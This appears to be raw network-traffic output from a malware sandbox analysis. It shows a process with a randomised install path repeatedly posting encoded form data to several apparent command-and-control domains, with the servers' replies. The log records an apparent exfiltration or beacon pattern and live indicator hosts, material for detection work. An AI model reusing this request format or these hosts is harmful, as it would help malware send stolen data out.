                                                                        GET /q6od/?J8LHgDJp=LfsI10JCm28n9wRtu+WKZQZOOeP2R4+f5k1rV9zDAVl7gnOY+STnccMWAxzuycS6lIdYQVNguf/7P6n2dnZScMvaSF16brm/Uh4MwjbERtDYretDLoFMjBxL8OHqrNB6Qw==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.digitaladpro.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:28.989882946 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:36:28 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Server: ghs
                                                                        Content-Length: 1730
                                                                        X-XSS-Protection: 0
                                                                        X-Frame-Options: SAMEORIGIN
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                        Nov 9, 2024 05:36:28.989898920 CET | 701 | IN
                                                                        Data Ascii: oglelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 1


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        13 | 192.168.2.5 | 49994 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:34.182660103 CET | 749 | OUT | POST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=jaHYnxR927KNduLeTvKcF7oJJasSKAX/8wq32cbqPxWxvO9QrHkQusi29wk0yE1sZCRY4Jpa8b88SprUjASoL3kijtEI41zgarDJbHWboEdxjWzgEzd4FaFtiNlY4loBv96/m8JD1qU1vjLxHrMZUhfb748gPVEZYuCzVnrcQQzh9Rc9ySygJE1R+Bfwm1oGTQLXDL4=
                                                                        Nov 9, 2024 05:36:34.831196070 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:34 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        14 | 192.168.2.5 | 49995 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:36.725117922 CET | 769 | OUT | POST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=jaHYnxR927KNfO7eRIWcDboIG6sSfQXF8xW32denOHGxsqxQ5WkQn8i2pgkt8k1ZZCcl4Npa8bo8StvUjz6pKnkg3dEKllzgarDJbHCioEVxijjgGWp/ZqFqlNlYuVodv96nm+t51oc1vhjxH6MYDRfRjY9AP2VCev+kVh2lRT+cxHtXow6IakZpuSXH3FJvJzbndcsEgRtVYDHbWwhWf8ys/nb/
                                                                        Nov 9, 2024 05:36:37.394328117 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:37 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        15 | 192.168.2.5 | 49996 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:39.279053926 CET | 1786 | OUT | POST /ylto/ HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.omnibizlux.biz
                                                                        Referer: http://www.omnibizlux.biz/ylto/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
                                                                        Nov 9, 2024 05:36:39.948308945 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:39 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.5 | 49997 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:41.813235044 CET | 490 | OUT | GET /ylto/?J8LHgDJp=uYv4kBsD3a2LIu39RI2EN5QaJ/QGWlTF0j2ZxsKcJFSdquhIvwsPj5Km9wQw9lg3VAI27qB+9KUHV5rrvR7hLmJ3jtEB7TDQFLuda37LuGp+gEzOJmBCc5BPpe4hsE5s8g==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.omnibizlux.biz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:42.494493008 CET | 705 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:36:42 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 555
                                                                        Connection: close
                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.26.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.5 | 49998 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:47.595062017 CET | 752 | OUT | POST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=Gt6S1kESFJ9IEQxsKBjJy7miOVRH1T1sPU8x4SwQkLe5qX9WlKP2nKi9v1kN6aPolux3AOfLIeMjt6ecJRFVVp1OkP8mhYeZdRWBPXckD8nagHjeTk8uvvlW5K2hoeuNea/9CY6MMMhwJZm5CdsvTJR/vja3qgS59pDG/tyiRvQ1ZobVd7f3gEYCNIOfYIJOSeuRCt4=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.5 | 49999 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:50.129931927 CET | 772 | OUT | POST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=Gt6S1kESFJ9IVABsInrJ0bmhE1RH+z1gPVAx4TkAk565r11WkLP2kKi97lkMnqP2luMAALnLIewjt7OcJCtKHJ1Qtv84lYeZdRWBPXZ5D8fagWTecl8pzflVu62hseuJea/DCZnnMOZwJYW5DO0uE5R5hDbAtwn0ioiG3rj3CcVUR+q/HZXfzk06dbGoJ4onI9+hc6uM/2bLnHgyHuwLWHemXDJU


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.5 | 50000 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:52.679604053 CET | 1789 | OUT | POST /fdhm/ HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.energyparks.net
                                                                        Referer: http://www.energyparks.net/fdhm/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.5 | 50001 | 3.33.130.190 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:36:55.226936102 CET | 491 | OUT | GET /fdhm/?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.energyparks.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:36:55.861824036 CET | 414 | IN | HTTP/1.1 200 OK
                                                                        Server: openresty
                                                                        Date: Sat, 09 Nov 2024 04:36:55 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 274
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?J8LHgDJp=LvSy2RgWDp4XGg9UUwSL95nwMTpQ1E5XJngg5CsNqq22kikTstX/mPq/7EMqvdfjgfwUWsD0UoRe2cy8XzVdEttk7M0krM2NWyLTMEkrELr+3VPpc3E0q8VpqI+fnYrBcQ==&aF=JLp4o0Qx2F-p4F"}</script></head></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.5 | 50002 | 162.241.63.77 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:01.231091976 CET | 755 | OUT | POST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=Fihdf0fowdItqXo8rWLLIou1fqmcvLT2+IWLH1c667GitdOxc4Z0SAS7trDx1ICHLCEv0flN7m7fenMgaOVDyVkU82ZlvMHvIj5lyfkdo1uVSyGw05Jo/NHawzOtAbJgSaFDetxgyXqE1A3Vcof0wF50ZACC8rRVQazVNuRIguyKtQWczicIptMJHlouKEl5bYUyuAk=
                                                                        Nov 9, 2024 05:37:01.953357935 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:01 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Nov 9, 2024 05:37:01.953381062 CET | 327 | IN | Data Raw: [continuation of gzip-compressed response body]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.5 | 50003 | 162.241.63.77 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:03.779086113 CET | 775 | OUT | POST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=Fihdf0fowdIto3487HLLOIu2QKmclrTy+IaLH3xx5Iiit8+xG8t0RAS74bC7xIDqLCIJ0eZN7mffencga+pcyFkKxWZny8HvIj5lyfw3oxCVSi2w1dd33tHVkjOtEbJkSaE5evFOyVSE1FTVc5f3/F5+HwCWzIwaesDIMsAUmuuUsmn2pAUg6NgxX2gZb0EQB7ECwXwDPUTvMgp4AwYQr2VF7xug
                                                                        Nov 9, 2024 05:37:04.515614986 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:04 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Nov 9, 2024 05:37:04.515636921 CET | 327 | IN | Data Raw: [continuation of gzip-compressed response body]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        23 | 192.168.2.5 | 50004 | 162.241.63.77 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:06.321697950 CET | 1792 | OUT | POST /e3rr/ HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.estrela-b.online
                                                                        Referer: http://www.estrela-b.online/e3rr/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:07.040445089 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                        Date: Sat, 09 Nov 2024 04:37:06 GMT
                                                                        Server: Apache
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Upgrade: h2,h2c
                                                                        Connection: Upgrade
                                                                        Vary: Accept-Encoding
                                                                        Content-Encoding: gzip
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        Content-Length: 1165
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Nov 9, 2024 05:37:07.040463924 CET | 327 | IN | Data Raw: [continuation of gzip-compressed response body]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        24 | 192.168.2.5 | 50005 | 162.241.63.77 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:08.902549028 CET | 492 | OUT | GET /e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F HTTP/1.1
                                                                        Host: www.estrela-b.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Connection: close
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Nov 9, 2024 05:37:09.628434896 CET | 595 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Sat, 09 Nov 2024 04:37:09 GMT
                                                                        Server: nginx/1.23.4
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                        X-Redirect-By: WordPress
                                                                        Location: http://estrela-b.online/e3rr/?J8LHgDJp=IgJ9cBvr78oV/XAx6CGZHJrYQ+q7gdvT6YSgAnJN3Ii+ka2zR4pFTGuYtard36/gOxMLoedf5n7SHRQ/SfZ0+VwBsW9Pxqn6Ah8T9/ZStSyIEzKK6cN23N3L3zzTI9ofHg==&aF=JLp4o0Qx2F-p4F
                                                                        X-Newfold-Cache-Level: 2
                                                                        X-Endurance-Cache-Level: 2
                                                                        X-nginx-cache: WordPress
                                                                        X-Server-Cache: true
                                                                        X-Proxy-Cache: MISS


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        25 | 192.168.2.5 | 50006 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:19.713305950 CET | 752 | OUT | POST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 209
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=uFQiYEVHaVxLkn5qR+2nnpKQ8xeIpuHPuNu/5GtubxY7PGp9AuW5U81Fr4YTlwTvkGORgqyhDnfFkNPGJ0DQXew90/rl2nXAxFmh/l7RYSlm144FhIH9THnHOnhFUlCWTOqwsi1hXsgLAdrQ4aqRp+TO+3HtK9OFdSgXBlOQGOukY3DvJjuKhznuZGjEIWHsJRolk10=
                                                                        Nov 9, 2024 05:37:20.370877981 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:20 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        26 | 192.168.2.5 | 50007 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:22.253962040 CET | 772 | OUT | POST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 229
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp=uFQiYEVHaVxLkHJqd9OnwZKXwReInOGGuMS/5DJ+bC87In59Ds+5R81FhYYW4AT4kGTmgrehDnLFkPHGJFDTNuwz4frj7HXAxFmh/lv/YStm1rQFgpH6ennAY3hFF1CSTOqSsjpLXuYLAZnQ5Lqej+TAzXGkDtfZaiU8KkbJHYuyQhyFTBmiyTLWJVrzZmmFTy4V6igk7vGL9OdeLqtwEB+NzNWh
                                                                        Nov 9, 2024 05:37:22.935378075 CET | 369 | IN | HTTP/1.1 404 Not Found
                                                                        Server: nginx/1.26.1
                                                                        Date: Sat, 09 Nov 2024 04:37:22 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Content-Encoding: gzip


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        27 | 192.168.2.5 | 50008 | 167.172.133.32 | 80 | 3660 | C:\Program Files (x86)\rBqzZzzHcmwzxiopDSMsktNKnyKFJzhHHmutzYqlidQUGbRoAWJSJLqnMwXwwzM\MKVNVRSuoK.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Nov 9, 2024 05:37:24.804192066 CET | 1789 | OUT | POST /2493/ HTTP/1.1
                                                                        Host: www.winspinoffr.pro
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                        Accept-Language: en-US,en;q=0.5
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Content-Length: 1245
                                                                        Cache-Control: max-age=0
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Origin: http://www.winspinoffr.pro
                                                                        Referer: http://www.winspinoffr.pro/2493/
                                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; One X Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                        Data Ascii: J8LHgDJp= [TRUNCATED]
